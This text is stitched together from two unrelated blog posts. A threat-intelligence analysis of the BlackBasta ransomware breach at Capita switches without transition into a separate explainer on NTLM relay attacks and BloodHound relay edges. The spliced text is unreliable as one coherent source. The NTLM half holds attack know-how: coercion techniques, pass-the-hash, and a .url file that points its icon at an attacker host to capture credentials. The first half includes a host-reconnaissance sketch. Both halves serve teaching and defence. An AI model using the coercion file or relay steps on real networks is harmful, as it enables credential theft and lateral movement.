Introduction
When a company that manages data for millions of UK citizens falls victim to ransomware, the whole industry should pay attention to it. On 15 October 2025, the UK Information Commissioner’s Office (ICO) published a detailed 136 page report about the Capita breach.
The aim of this blog is to extract actionable cybersecurity lessons from the ICO’s findings as well as open source reports surrounding the breach from a cyber threat intelligence (CTI) analyst’s perspective to help SOC and CERT teams, and CISOs understand what happened and how to avoid the mistakes made by others.
BLUF Incident Impact Summary:
Capita was attacked by BlackBasta ransomware in March 2023
Over six million individuals’ records were exfiltrated from Capita’s systems
A £14 million fine was issued to Capita by the ICO
Capita said in May 2023 that recovering from the incident had cost up to £20 million
Important context about Capita
The Capita Group is a business process outsourcing (BPO) and professional services group employing approximately 34,500 people worldwide and with a reported annual revenue of £2,421.6 million. For readers outside of Great Britain, Capita is best known as the UK’s go-to managed service provider for large-scale, data-sensitive public sector operations.
Companies within the Capita Group act as data processors for a range of business services to both public and private sector organisations. Capita plc is the ultimate parent company of a large corporate group consisting of multiple legal entities.
Capita has long been one of the UK government’s biggest suppliers of outsourced services.
They manage (or have managed):
The BBC TV Licensing system
The UK Congestion Charge for Transport for London (TfL)
The National Pupil Database – via contracts with the Department for Education
Electronic tagging of offenders – under contracts with the Ministry of Justice
Council administration and call-centre services – for many local authorities (e.g., Birmingham, Southampton, Sheffield)
Numerous Local Government and private sector pension schemes (including universities, utilities, and insurance companies).
Ministry of Defence (MOD) – Training and support contracts for the British Army’s Recruitment Partnership Project (including vetting systems) and Royal Navy training programmes.
The ICO established that during the Incident, data was exfiltrated from two legal entities which were acting as data controllers, and from four legal entities which were acting as data processors:
Capita plc - Capita plc’s focus includes Central Government, Local Public Service, Defence, Education, and Pensions. Capita was selected to administer the UK’s Civil Service Pension Scheme (CSPS) from September 2025, via a contract worth £239m over 10 years.
Capita Resourcing Limited - is a subsidiary of Capita plc focused on resourcing/human-capital services, i.e., recruitment, contingent staffing, talent acquisition.
Capita Business Services Limited - is another subsidiary that provides business-process and digital services (as a part of the Capita outsourcing ecosystem). The supplier record shows over £331.9m recorded government spending linked to this entity.
Capita Pension Solutions Ltd (CPSL) - a regulated pensions business within the Capita Group. Its role: delivering pensions administration and consulting services for pension schemes, including defined benefit schemes.
Breach Timeline
In the ICO’s report, a timeline of events that led to data exfiltration and ransomware deployment was provided. The timeline diagram below helps illustrate what happened.
The Record also reported that Capita’s share price dropped more than 12%, from a high of £38.64 ($47.97) on March 30, the day before the incident was first reported, to £33.72 ($42.58) on Wednesday morning.
On 3 April 2023, Capita released a public statement about the cyber incident. At the time, Capita said the “issue was limited to parts of the Capita network and there is no evidence of customer, supplier or colleague data having been compromised.”
On 8 April 2023, Brett Callow spotted that Capita had been listed on BlackBasta’s Tor data leak site; the listing was removed later that same day.
Security researcher Kevin Beaumont, who analysed the leaked data samples at the time, identified copies of stolen passport scans, PII records, bank account details, and internal floor plans of multiple buildings belonging to various schools as well as Capita Nuclear, part of Capita Business Services.
It took Capita until 20 April 2023 to confirm that some of its systems were in fact breached and that data had been stolen.
Types of Stolen Data
In the ICO’s report, we learn that 6,024,221 data subjects for whom Capita was the data processor had personal data exfiltrated, as determined by Capita’s forensic provider.
The types of data stolen included sensitive information such as home addresses, email addresses, phone numbers, National Insurance numbers, driving licence scans, passport scans, bank account numbers and sort codes, credit card numbers, biometrics, criminal record checks, and employee login details.
BlackBasta Operator TTPs
The tactics, techniques, and procedures (TTPs) of the BlackBasta operators provided in the breach timeline by the ICO are useful for understanding what technical steps were involved that led to the breach and ransomware attack. A summary of key aspects of the attack has been mapped to the diamond model diagram below.
Outside of the breach timeline, some additional technical details were shared:
Following initial access, the Threat Actor accessed the ‘CAPITA\backupadmin’ service account approximately 4.5 hours later. Capita could not confirm how the Threat Actor was able to escalate their privileges; however, there were traces of Kerberos credential harvesting and reconnaissance activity found following the Incident.
The Threat Actor was able to use the ‘CAPITA\backupadmin’ domain administrator account to pivot to administrator accounts in different Capita domains. In total, no fewer than eight domains were compromised, a very large quantity of data was exfiltrated, and the Threat Actor attempted to deploy ransomware on at least 1,057 hosts.
Even though Capita quarantined the device through which the Threat Actor first gained access on 24 March 2023, by this time the Threat Actor had deployed software into the network which had enabled them to establish persistence and ultimately allowed them to continue moving laterally across the network into different Capita domains and to access/exfiltrate data, before deploying ransomware on 31 March 2023.
Interestingly, in February 2025, internal chat logs from the BlackBasta gang were leaked publicly online. Analysis of the leaked chat logs for references to Capita revealed the command below, shared by one of the BlackBasta members months after the attack happened:
The domain "corpcitrix.ad.capita.co.uk" appears to be an internal Active Directory domain name used by Capita to host its corporate Citrix environment. The "ad" label shows it’s an AD DNS namespace, "corpcitrix" indicates the environment is for Citrix-published desktops/apps or related infrastructure, and "capita.co.uk" is the organisation’s registered domain.
The command shown above is a PowerShell invocation (potentially executed via Cobalt Strike) to enumerate every system in the domain, resolve each machine’s IP address, and save the results to a file named “SFS_pc.txt”. Powerpick runs the code in an unmanaged PowerShell environment and can execute without depending on powershell.exe.
In short, this command shows a BlackBasta operator performing network reconnaissance, mapping hosts to IPs (likely to plan lateral movement, targeting, exfiltration, or ransomware deployment).
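As a rough Python sketch of that reconnaissance logic, the steps boil down to enumerating hostnames, resolving each to an IP, and writing the results to a file. This is an illustration of the described behaviour, not a reproduction of the leaked command; the hostnames below are placeholders, and only the output filename comes from the leak analysis:

```python
import socket

def map_hosts(hostnames, outfile):
    """Resolve each hostname to an IP and record the results,
    mirroring the recon step described above (illustrative only)."""
    lines = []
    for host in hostnames:
        try:
            ip = socket.gethostbyname(host)
        except socket.gaierror:
            ip = "unresolved"
        lines.append(f"{host} {ip}")
    with open(outfile, "w") as f:
        f.write("\n".join(lines))
    return lines

# Placeholder hosts: one resolvable, one guaranteed-unresolvable (.invalid TLD)
results = map_hosts(["localhost", "no-such-host.invalid"], "SFS_pc.txt")
```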
Notable moments during the Incident
Critical alerts were mishandled or deprioritised: The initial malicious file (‘jdmb.js’) triggered a P2 (High) alert at 08:00 on 22 March 2023, indicating compromise. The SOC did not act for nearly 58 hours, despite automatic escalation warnings for missed service-level agreements (SLAs). The ICO also noted that “at no point in the six months before or after the Incident did Capita meet their SLA for any alert level.”
Excessive delay between detection and containment, plus a lack of automation: Isolation of the device from the rest of the Capita network still required human intervention, which took 58 hours to arrive. Capita’s SOC lacked the ability to isolate the device automatically. By then, the attacker had already gained domain admin access and moved laterally.
Inadequate incident response procedures: Capita did not invoke its Major Incident Management process until 09:22 on 29 March 2023, which was seven days after compromise. By that point, data exfiltration was already underway and it was two days before ransomware was deployed on 31 March 2023.
Understaffed and overburdened SOC team: Capita is understood to have had one SOC analyst per shift in place at the time of the Incident in March 2023. This, combined with historic underperformance, indicates systemic issues within the SOC, including inadequate staffing, insufficient training, and/or inefficient processes.
Lessons Learned from the BlackBasta Ransomware Attack on Capita
Having tools isn’t enough: they must be configured, integrated, and monitored effectively
Capita had Trellix EDR, a SIEM, and a SOC, but alerts were missed and containment delayed.
Lessons: Security tools are only as effective as the people, processes, and automation supporting them. Critical security alerts must have clear, measurable response times with automatic escalation if breached. Security Leadership must define and enforce strong Service Level Agreements (SLAs) for incident response.
Implement proper Active Directory (AD) tiering
Lack of AD tiering allowed attackers to move laterally from low-privilege systems to domain controllers (specifically a backup service account with domain admin privileges).
Lessons: Segregate admin privileges between tiers (workstations, servers, domain controllers) to contain breaches. Limit, rotate, and monitor privileged accounts using a PAM solution to enforce least privilege. Regularly review service accounts, ensure unique credentials, and monitor their activity for anomalies.
Act on penetration test findings promptly
Multiple pentests also warned of AD and privilege issues months before the breach, but fixes were delayed.
Lesson: Treat pentest reports as actionable tasks with deadlines and executive oversight.
Automate incident response where possible (SOAR)
Lack of Security Orchestration, Automation and Response (SOAR) led to manual triage delays.
Lesson: Use SOAR playbooks to automate containment, escalation, and alert enrichment for faster response.
NTLM relay attacks have been around for a long time. While many security practitioners think NTLM relay is a solved problem, or at least a not-so-severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts nowadays, paving a path for lateral movement and privilege escalation.
NTLM relay attacks are more complicated than many people realize. There are a lot of moving parts that operators have to track using different tools, but we have recently introduced NTLM relay edges into BloodHound to help you keep on thinking in graphs with new edges that represent coercion and relay attacks against domain-joined computers, originating from Authenticated Users and leading into the computer that could be compromised via SMB, LDAP/LDAPS, and ADCS ESC8. Each of these edges is composed of different components and prerequisites, but they all follow the same “Zero to Hero” pattern from Authenticated Users to the would-be compromised computer.
While there are many great resources on this old attack, I wanted to consolidate everything you need to know about NTLM into a single post, allowing it to be as long as needed, and I hope everyone will be able to learn something new.
Once Upon a Time
NTLM is a legacy authentication protocol that Microsoft introduced in 1993 as the successor to LAN Manager. NTLM literally stands for New Technology LAN Manager, a name that didn’t age well. While Kerberos is the preferred authentication protocol in Active Directory environments (and beyond), NTLM is still widely used whenever Kerberos isn’t viable or, more commonly, when NTLM usage is hard-coded.
NTLM Fundamentals
My favorite research area is authentication protocols, and over the years, I’ve noticed that every authentication protocol is designed to thwart one or two primary threats. For NTLM, I believe it is replay attacks. Not relay attacks (obviously, given the title), but replay attacks, where an attacker intercepts a valid authentication exchange and replays the packets/messages later to impersonate the victim. NTLM prevents such attacks using a challenge-response exchange: the server generates a random challenge, and the client produces a cryptographic response that proves possession of the client’s credentials.
The NTLM authentication exchange involves a three-message exchange:
The Negotiate (type 1) message is sent from the client to the server to initiate authentication and negotiate session capabilities, such as a session key exchange and signing (more on those later), through a set of flags indicating the client’s supported/preferred security attributes for the session.
The Challenge (type 2) message is sent from the server to the client. It contains a corresponding set of flags indicating the server’s supported/preferred session capabilities and an 8-byte randomly generated nonce, known as the server challenge.
The Authenticate (type 3) message is sent from the client to the server. It contains a set of flags indicating the determined session capabilities based on the client’s and server’s preferences and a cryptographically generated response to the server challenge. There are two major NTLM response generation algorithm versions: NTLMv1 and NTLMv2.
The server then validates the response to authenticate the client. Local accounts are validated against the NT hashes stored in the local SAM, and domain accounts are sent to a domain controller for validation via the Netlogon protocol.
NTLMv1
NTLMv1 is the original response algorithm. It was developed in 1993, in the unfortunate days when DES was the standard encryption algorithm, so that’s what Microsoft used to generate the response, as described in the diagram below:
As shown above, the client’s password is transformed into an NT hash, which is the MD4 hash of the Unicode-encoded password, to be used as the DES encryption key. However, there was a little hiccup: the NT hash was 16 bytes, while the effective DES key length was 7 bytes. Microsoft came up with a creative solution — split the NT hash into three keys: the first seven bytes, the following seven bytes, and the last two bytes padded with zeros. Each of these keys encrypts the server challenge three times independently, and the ciphertexts are concatenated to produce a 24-byte-long response.
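The key-splitting step can be shown concretely in Python. DES itself isn't in the standard library, so this sketch stops at deriving the three 8-byte DES keys (each 7-byte chunk is expanded with odd-parity bits, as DES expects); each key would then independently encrypt the 8-byte server challenge, and the three ciphertexts concatenate into the 24-byte response:

```python
def expand_des_key(key7: bytes) -> bytes:
    """Expand a 7-byte chunk into an 8-byte DES key:
    7 key bits per byte, least-significant bit set to odd parity."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:  # force odd parity
            b |= 1
        out.append(b)
    return bytes(out)

def ntlmv1_des_keys(nt_hash: bytes):
    """Split the 16-byte NT hash into three DES keys: bytes 0-6,
    bytes 7-13, and bytes 14-15 padded with five zero bytes."""
    assert len(nt_hash) == 16
    padded = nt_hash + b"\x00" * 5  # 21 bytes total
    return [expand_des_key(padded[i:i + 7]) for i in (0, 7, 14)]

keys = ntlmv1_des_keys(bytes(range(16)))  # dummy NT hash for illustration
```

The five known zero bytes in the third key are exactly why the Marlinspike/Hulton attack works so well: that key has only 16 bits of entropy.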
NTLMv1 is Bad
NTLMv1 turned out to be a bad idea for three main reasons:
First, DES encryption is… not great, as it can be cracked relatively easily.
Second, the response isn’t “salted”, meaning that the same password and server-challenge combination always produces the same response, making it susceptible to rainbow table attacks.
Third, combining the two previous reasons makes one of my all-time favorite attacks, discovered by Moxie Marlinspike and David Hulton. They managed to recover the raw NT hash by cracking each of the three ciphertexts individually, using rainbow tables and custom hardware. Why should we care about the NT hash? After all, it’s not a password, right? We’ll discuss the infamous Pass the Hash attack soon.
“NTLM2” Precedes NTLMv2
Just for completeness, I’ll mention “NTLM2”, also known as “NTLM2 Session Response” or “NTLMv1 with Enhanced Session Security”. This interim version between NTLMv1 and NTLMv2 introduced an 8-byte client-generated nonce, known as the client challenge. The client challenge was concatenated with the server challenge, and then the combined value was MD5-hashed and, finally, DES-encrypted as in NTLMv1. This enhancement ensured every response was unique and thwarted rainbow table attacks. However, the algorithm is still fundamentally flawed, and the NT hash can be recovered with modern GPUs within less than 24 hours, on average, at a cost of about $30.
NTLM2 is just a distraction, though. Feel free to forget you ever read the paragraph above.
NTLMv2
Shortly after, still in the ’90s, Microsoft released NTLMv2, replacing DES encryption with HMAC-MD5, as described below. This algorithm is still in use today.
The NT hash is used as the key to generate an HMAC of the client’s domain name and username. It is called the “NT One Way Function v2” or NTOWFv2. The NTOWFv2 HMAC value is then used as the key to generate another HMAC, this time of the server challenge, along with additional information, such as a random client challenge and a timestamp to thwart rainbow table attacks, and additional session attributes, which we will discuss later. This HMAC value is the NT Proof String or NTProofStr. Many people mistakenly think that the NTProofStr is the NTLMv2 response, but it is only part of it. All the additional information used to generate the NTProofStr is also included in the NTLMv2 response to allow the server to generate the same HMAC and validate the client’s response.
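The two HMAC steps map directly onto Python's standard library. This is a simplified sketch: the real "blob" carries the timestamp, client challenge, and AV pairs in a fixed binary layout, and the NT hash (the MD4 of the UTF-16LE password) is taken here as a given input:

```python
import hmac
import hashlib

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over
    uppercase(username) + domain, encoded as UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()

def nt_proof_str(ntowf: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over the server challenge
    plus the blob (blob simplified; really a structured byte layout)."""
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()

key = ntowf_v2(b"\x11" * 16, "alice", "CORP")  # dummy NT hash / account
proof = nt_proof_str(key, b"\x22" * 8, b"client-challenge+timestamp+avpairs")
```

Note that any change to the blob changes the NTProofStr, which is exactly the property the MIC-presence flag and channel binding token rely on later in this post.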
LM Compatibility Level
Every Windows host acts as both a server, when someone authenticates to it, and a client, when it authenticates to another host. A single registry value controls both the server and client NTLM version support, located at HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel. It allows enabling/disabling NTLMv1 and NTLMv2 for the entire host as a server and as a client, as described in the table below:
When a client authenticates to a member server using a domain account, the server sends the response to a DC for validation. Therefore, the DC’s LmCompatibilityLevel is the one that determines whether NTLMv1 is accepted or not. Note that different DCs can technically have different configurations. However, it is very uncommon to see DCs with LmCompatibilityLevel set to 5 (I’ve never seen that outside of lab environments), so it’s safe to assume the DC will support both NTLMv1 and NTLMv2, as a server, for domain accounts.
It is not uncommon to see DCs with a lower LmCompatibilityLevel. I believe the reason is that some sysadmins mistakenly think that a lower LmCompatibilityLevel is required to support NTLMv1 clients in the domain, while, in fact, they just enable NTLMv1 on the DCs as clients, which can have dire consequences, as we will explain soon.
Looking at the table above, we can make a few observations:
As a client, a Windows host can have either NTLMv1 or NTLMv2 enabled but not both.
As a server, a Windows host will likely enable both NTLMv1 and NTLMv2.
If a Windows host enables NTLMv1 as a client, it must also enable it as a server.
A Windows host doesn’t have to enable NTLMv1 as a client to enable it as a server.
Additional settings allow restricting or auditing outgoing or incoming NTLM authentication or requiring session security settings, but we won’t elaborate on those.
Password Cracking is a Problem
There are different tools for capturing NTLM responses for cracking. Responder is the most well-known and widely used tool, but Inveigh and Farmer deserve an honorable mention, too.
An attacker can potentially crack a captured NTLM exchange, whether it’s NTLMv1 or NTLMv2, to recover the password if it is not sufficiently strong. In the case of NTLMv1, the NT hash can always be recovered, and it can be abused in a couple of ways. If it is a computer/service account, the attacker can forge an RC4-encrypted Kerberos silver ticket and impersonate a privileged account to the host or the service. The NT hash can also be used for NTLM authentication, without cracking the cleartext password, through the infamous Pass the Hash attack.
Pass the Hash
When taking a closer look at the NTLMv1 and NTLMv2 flows, you may notice that, technically, we don’t need the cleartext password to produce a valid NTLM response. If we skip the first step in the flow, the NT hash is all we need.
Who Needs to Crack Passwords Anyway?
The real problem with NTLM is relay attacks. An attacker can simply relay the NTLM messages between a client and server, back and forth, until the server establishes a session for the client, allowing the attacker to perform any operation the client could perform on the server. For clarity, we will refer to the client as the “victim” and the server as the “target”.
Relay attacks allow authenticating as the victim to the target without spending time and resources on password cracking and without depending on weak passwords.
Not an Opportunistic Attack
Some defenders belittle relay attacks because they seem to be somewhat opportunistic. However, relay attacks can be executed with intention and precision when combined with authentication coercion attacks.
Generally, the mechanics of computer account authentication coercion and user account authentication coercion are different.
Computer Account Authentication Coercion
Computer account authentication coercion typically involves an RPC call to a vulnerable function on a remote host (the relay victim). Specifically, we’d try to call a function that would attempt to access an arbitrary path we can control. Then, when the remote service attempts to access the specified path, we’d require authentication and kick off a relay attack. The remote service would authenticate as the relay victim computer account if the service runs as SYSTEM or NETWORK SERVICE and if it doesn’t impersonate a different context before attempting to access the resource.
The two most notable computer authentication coercion primitives are the Printer Bug and PetitPotam. The Printer Bug abuses the function RpcRemoteFindFirstPrinterChangeNotification[Ex] in the Print Spooler service, which establishes a connection to an arbitrary path to send notifications about print object status changes. PetitPotam abuses several functions in the Encrypting File System (EFS) service, such as EfsRpcOpenFileRaw, which opens a file in an arbitrary path for backup/restore. These techniques result in an immediate authentication attempt from the victim computer account without user interaction.
Authenticated Users are permitted to trigger these computer account authentication coercion attack primitives, allowing almost anyone to initiate the relay attack.
User Account Authentication Coercion
User account authentication coercion is more complicated and, in some cases, somewhat opportunistic. The classic user account authentication coercion primitives involve planting a reference to an external resource in a document, email, or even a web page. When the victim renders the document, the client attempts to load the resource, sometimes without their knowledge or consent, and initiates an authentication attempt with the user’s credentials. These primitives require one to three clicks and can be sent directly to the victim or strategically planted in a high-traffic shared folder or website for a watering hole attack.
Dominic Chell highlighted a more sophisticated, well-known approach that abuses Windows Shell. Windows Shell is the operating system’s user interface. It has extensions and handlers that enrich the user experience, for example, by generating thumbnails/previews or customizing icons. Specially crafted files can manipulate these mechanisms to access arbitrary paths as soon as the operating system “sees” them, without any user interaction. The most common way to abuse it is to pass to the icon handler a reference to an attacker-controlled path, which would result in a user authentication attempt as soon as the user browses the folder in which the file is located, even if the user doesn’t even click or highlight the file. The most notable file types that support this kind of manipulation are:
Windows Search Connectors (.searchConnector-ms)
URL files (.url)
Windows Shortcuts (.lnk)
Windows Library Files (.library-ms)
For example, the following URL file would try to load its icon from the path \\attackerhost\icons\url.icon from the user’s security context, so it authenticates with the user’s credentials.
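A minimal `.url` file of that shape looks like the following. This is a reconstruction from the described behaviour (the `IconFile` path comes from the text above; the `URL` value is an arbitrary placeholder):

```ini
[InternetShortcut]
URL=https://example.com
IconIndex=0
IconFile=\\attackerhost\icons\url.icon
```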
Attackers can drop these files in strategic file shares, such as high-traffic file shares or those frequently used by privileged users, and then kick off a relay attack as soon as an authentication attempt comes through.
Credential Abuse Without Lateral Movement
Traditionally, when attackers gain admin access to a host with an interesting logged-on user, they would move laterally to that host and then attempt one of many credential abuse techniques to impersonate the user and continue maneuvering toward their objectives. However, as EDRs and other endpoint security solutions improve, the detection risk of lateral movement and credential abuse TTPs increases.
Instead, attackers can reduce the detection risk by accessing the remote file system via an administrative share, such as C$, and dropping an authentication coercion file on the logged-on user’s desktop. The moment the file is dropped, Windows Shell starts processing it, and an authentication attempt to the attacker-controlled host is initiated. It works even if the file is hidden, the workstation is locked, or the RDP session is disconnected. More specifically, it works as long as explorer.exe runs in a suitable security context, meaning it is associated with a logon session with credentials cached in the MSV1_0 authentication package.
The attacker can try to crack the NTLM response to recover the password or establish a session on a target server by relaying it.
Taking Over 445
In case you missed it, it is possible to bind a listener to port 445 on Windows hosts without loading a driver, loading a module into LSASS, or requiring a reboot of the Windows machine, as Nick Powers discovered last year.
Too Good to Be True?
So far, NTLM relay attacks may seem very powerful and somewhat simple. However, over the years, Microsoft introduced several mitigations to complicate things.
Session Security
NTLM supports signing (integrity) and sealing (encryption/confidentiality) to secure the session. It is achieved by exchanging a session key in the NTLM Authenticate message. The client generates a session key and RC4-encrypts it using a key generated, in part, from the client’s NT hash. A common misunderstanding is that when signing is negotiated, NTLM relay attacks fail to establish a session (authenticate). However, even with signing, authentication is successful. The problem is that the attacker can’t recover the session key without possessing either the victim’s NT hash or the target’s credentials. But if the attacker possessed either of them, there would be no need for relaying anyway. Therefore, if the target indeed requires all the subsequent messages in the session to be signed with the session key, the attacker would not be able to use the session. Luckily for the attackers, not all servers implement such a requirement, as we will see soon.
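To make the session-key exchange concrete, here is a pure-Python RC4 sketch. RC4 isn't in the standard library, and the key-exchange key derivation is reduced to an opaque input, since the real derivation varies with the negotiated NTLM version and flags:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Illustration only: RC4 is long broken."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# The client picks a random session key and sends it RC4-encrypted under a
# key-exchange key ultimately derived from its NT hash (derivation elided).
key_exchange_key = b"\x33" * 16   # stand-in for the derived key
session_key = b"\x44" * 16        # stand-in for the random session key
encrypted = rc4(key_exchange_key, session_key)
```

A relaying attacker sees `encrypted` on the wire but cannot recover `session_key` without the key-exchange key, which is why a signing-enforced session is unusable to them even though the authentication itself succeeds.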
The screenshot below shows a portion of a typical NTLM Authenticate message in which a session key is exchanged and signing is negotiated.
The premise of an NTLM relay attack is a man-in-the-middle position. Therefore, the attacker’s obvious next step should be tampering with this Authenticate message in flight to remove the session key and reset the Negotiate Key Exchange and Negotiate Sign flags, pretending the victim never negotiated those.
Message Integrity Code (MIC)
Microsoft anticipated such attempts and introduced an integrity check to the NTLM messages. An HMAC is added to the Authenticate message to protect all three NTLM messages with the session key. The server validates the MIC upon receiving the message, and if a single bit in any of the three NTLM messages is flipped, authentication fails.
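Conceptually, the MIC is an HMAC-MD5 over the concatenated Negotiate, Challenge, and Authenticate messages, keyed with the exported session key, so flipping any bit in any of the three messages invalidates it. A sketch with stand-in message bytes:

```python
import hmac
import hashlib

def compute_mic(session_key: bytes, negotiate: bytes,
                challenge: bytes, authenticate: bytes) -> bytes:
    """MIC = HMAC-MD5(session key, Negotiate || Challenge || Authenticate)."""
    return hmac.new(session_key, negotiate + challenge + authenticate,
                    hashlib.md5).digest()

sk = b"\x55" * 16                                     # stand-in session key
mic = compute_mic(sk, b"NEG", b"CHAL", b"AUTH")       # stand-in messages
tampered = compute_mic(sk, b"NEG", b"CHAL", b"AUTh")  # one bit flipped
```

Since the attacker never learns the session key (see the previous section), they cannot recompute a valid MIC after tampering with the flags.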
Drop the MIC?
The MIC is a later addition to the NTLM protocol. Windows XP and Windows Server 2003 and older, as well as some 3rd party platforms, don’t support it. So, can’t the attacker drop the MIC and pretend the client never added it?
Microsoft anticipated that, too, and added an attribute to the NTLMv2 response indicating the MIC’s presence.
Therefore, an attacker would have to remove/reset that attribute before removing the MIC, but because this attribute is part of the NTLMv2 response, changing it would invalidate the NTProofStr, and authentication would fail.
Those of you who are paying attention should realize that NTLMv1 does not incorporate any additional information into the NTLMv1 response, meaning that NTLMv1 is always susceptible to MIC removal and tampering with the Negotiate flags and the session key.
A Blast From the Past
In 2019, Yaron Zinar and Marina Simakov discovered a couple of vulnerabilities in the NTLM implementation, allowing attackers to Drop the MIC even in NTLMv2. However, we will not delve into those because Microsoft released patches, and it is extremely rare to encounter Windows hosts affected by these vulnerabilities nowadays.
Channel Binding
Channel binding, also commonly referred to as Extended Protection for Authentication (EPA), is a mechanism that prevents man-in-the-middle attacks by incorporating a token from the secure channel (TLS), that is, the server certificate hash, into the NTLM Authenticate message. The server can compare the channel binding token to its own certificate hash and reject the authentication attempt if there is a mismatch. Any service running over TLS, such as HTTPS and LDAPS, can support channel binding.
Just like session security and the MIC, channel binding is not mandatory, but it is part of the NTLMv2 response, and therefore, it is protected by the NTProofStr, so the attacker can’t remove it and pretend it was never there. However, NTLMv1 does not support channel binding.
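The comparison the server performs can be sketched as follows. This is a simplification: the real token is an MD5 over a GSS channel-bindings structure whose application data embeds the TLS server certificate hash, and the field layout here is approximated:

```python
import hashlib

def channel_binding_token(server_cert_der: bytes) -> bytes:
    """Approximate CBT: MD5 over a simplified channel-bindings structure
    whose application data is 'tls-server-end-point:' + SHA-256(cert)."""
    app_data = b"tls-server-end-point:" + hashlib.sha256(server_cert_der).digest()
    struct = b"\x00" * 16 + len(app_data).to_bytes(4, "little") + app_data
    return hashlib.md5(struct).digest()

real_cert = b"real-server-cert-der"   # stand-in DER bytes
mitm_cert = b"attacker-cert-der"

# In a relay, the victim computes the token over the certificate it actually
# saw (the attacker's), so the real server's comparison fails:
token_via_attacker = channel_binding_token(mitm_cert)
token_expected = channel_binding_token(real_cert)
```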
Backward Compatibility
All these mitigations are later additions to the protocol, so some older or 3rd party platforms may not support them. Therefore, they may not be required by the target server. The server behavior depends on its configuration, whether it is configured to support or even require session security or channel binding, and whether it is designed or implemented to honor the session capabilities negotiated in the NTLM exchange. Given that this is just about the midpoint of this post, you can assume it is not uncommon for targets not to require or enforce these mitigations.
Protected Users
Microsoft introduced the Protected Users security group at the Windows Server 2012 R2 domain functional level to mitigate several attacks that can lead to credential material theft. Members of this group are not permitted to perform NTLM authentication, and hosts running Windows 8.1/Windows Server 2012 R2 or later do not cache their NT hash in LSA memory. These protections and others may have usability issues, so only privileged/sensitive accounts should be added to this group. Unfortunately, this group is too often left empty.
Not Too Good to Be True
Given everything discussed above, what are the conditions for relay attacks?
A relay attack should be viable if the target does not support these mitigations (by design, implementation, or configuration), or supports them but does not require them, and one of the following applies:
The victim does not negotiate session security and channel binding
The victim’s session negotiation is unprotected (NTLMv1)
The target implementation ignores the negotiated capabilities
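The conditions above can be distilled into a small predicate. This is an illustrative simplification, not BloodHound's actual logic; all the parameter names are invented for the sketch.

```python
def relay_viable(target_requires_mitigations: bool,
                 victim_negotiates_protections: bool,
                 victim_uses_ntlmv1: bool,
                 target_honors_negotiation: bool) -> bool:
    """Illustrative distillation of the relay viability conditions:
    relay works when the target does not require the mitigations AND
    the victim's protections are absent, strippable (NTLMv1), or
    ignored by the target implementation."""
    if target_requires_mitigations:
        return False
    return (not victim_negotiates_protections
            or victim_uses_ntlmv1
            or not target_honors_negotiation)
```

For example, a victim that negotiates session security is still relayable when the target implementation disregards the negotiated capabilities, which, as discussed next, is exactly what SMB servers do.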
Relaying is only half the story, though. A successful relay satisfies authentication and establishes a session. However, authorization, meaning what the attacker can do afterward, depends on the victim’s permissions.
Targeting SMB
The first and simplest scenario we introduced into BloodHound is relaying NTLM to SMB. SMB servers don’t support channel binding with NTLM, and they negotiate signing at the SMB protocol level, outside the NTLM exchange. This means that even if the victim negotiates signing in the NTLM Authenticate message, the target will disregard it and only consider what’s negotiated in the SMB headers, which the attacker can control. To be clear, configuring SMB clients to require SMB signing does not affect NTLM relay attacks.
Below is an excerpt from a typical SMB2 negotiate response message with SMB signing enabled but not required. The server is vulnerable to relay attacks if the signing required bit is not set.
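In code, that check reduces to testing a single bit of the SecurityMode field in the SMB2 negotiate response (flag values per MS-SMB2). The sketch below is a hedged illustration; transport handling and full packet parsing are omitted.

```python
# SecurityMode flags from the SMB2 NEGOTIATE response (MS-SMB2)
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

def smb_relay_target(security_mode: int) -> bool:
    """A host is a viable SMB relay target when the 'required' bit is
    clear, regardless of whether signing is merely enabled."""
    return not (security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)
```

Note that signing being "enabled" (0x0001) alone changes nothing for an attacker; only the "required" bit matters.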
Domain controllers starting with Windows Server 2008, and all Windows hosts starting with Windows Server 2025 and Windows 11, require SMB signing by default. In practice, this means that most Windows hosts out there today, especially Windows servers, don’t require SMB signing by default. Unfortunately, many organizations don’t change these defaults out of an unjustified fear of backward-compatibility issues or a myth about performance impact.
Introducing the CoerceAndRelayNTLMToSMB Edge
The new CoerceAndRelayNTLMToSMB edge is the simplest of the new NTLM relay edges. The edge always comes out of the Authenticated Users node and leads into the target computer node. It represents a combination of computer account authentication coercion against the relay victim and an NTLM relay attack against the relay target.
Collection
SharpHound collects all the required information as follows:
SMB signing status collection does not require authentication. It is collected from the relay target by actively establishing a connection with the host over SMB and parsing the SMB negotiation response messages.
Local admin rights are collected from the relay target. They can be collected from the host directly over RPC, which may or may not require admin rights, depending on the OS version and configuration, or from the DC via GPO analysis.
Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
SMB signing on the target computer is not required — this is the relay target. The edge will not be created if the SMB signing status is not collected/ingested into BloodHound.
At least one computer account in the environment has local admin access to the target computer — this is the relay victim.
There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn’t collected/ingested, it will be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge will not be created.
